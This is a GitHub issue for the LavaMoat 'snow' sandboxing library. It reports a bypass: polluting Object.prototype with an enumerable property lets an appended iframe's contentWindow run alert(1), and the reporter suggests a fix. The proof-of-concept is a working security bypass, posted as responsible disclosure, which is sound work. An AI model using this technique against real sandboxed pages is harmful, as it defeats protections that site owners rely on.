Bypass with Object.prototype pollution

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!

https://lavamoat.github.io/snow/demo/

MIT License

100 stars 9 forks source link

Bypass with Object.prototype pollution #112

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

Object.defineProperty(Object.prototype, 'haha', {
    enumerable: true,
    value: undefined
});

var f = document.createElement('iframe');
try {
    document.head.appendChild(f);
} catch (e) {}
f.contentWindow.alert(1);

Should use the Object from natives and Object.create(null)...

weizman commented 1 year ago

Brilliant!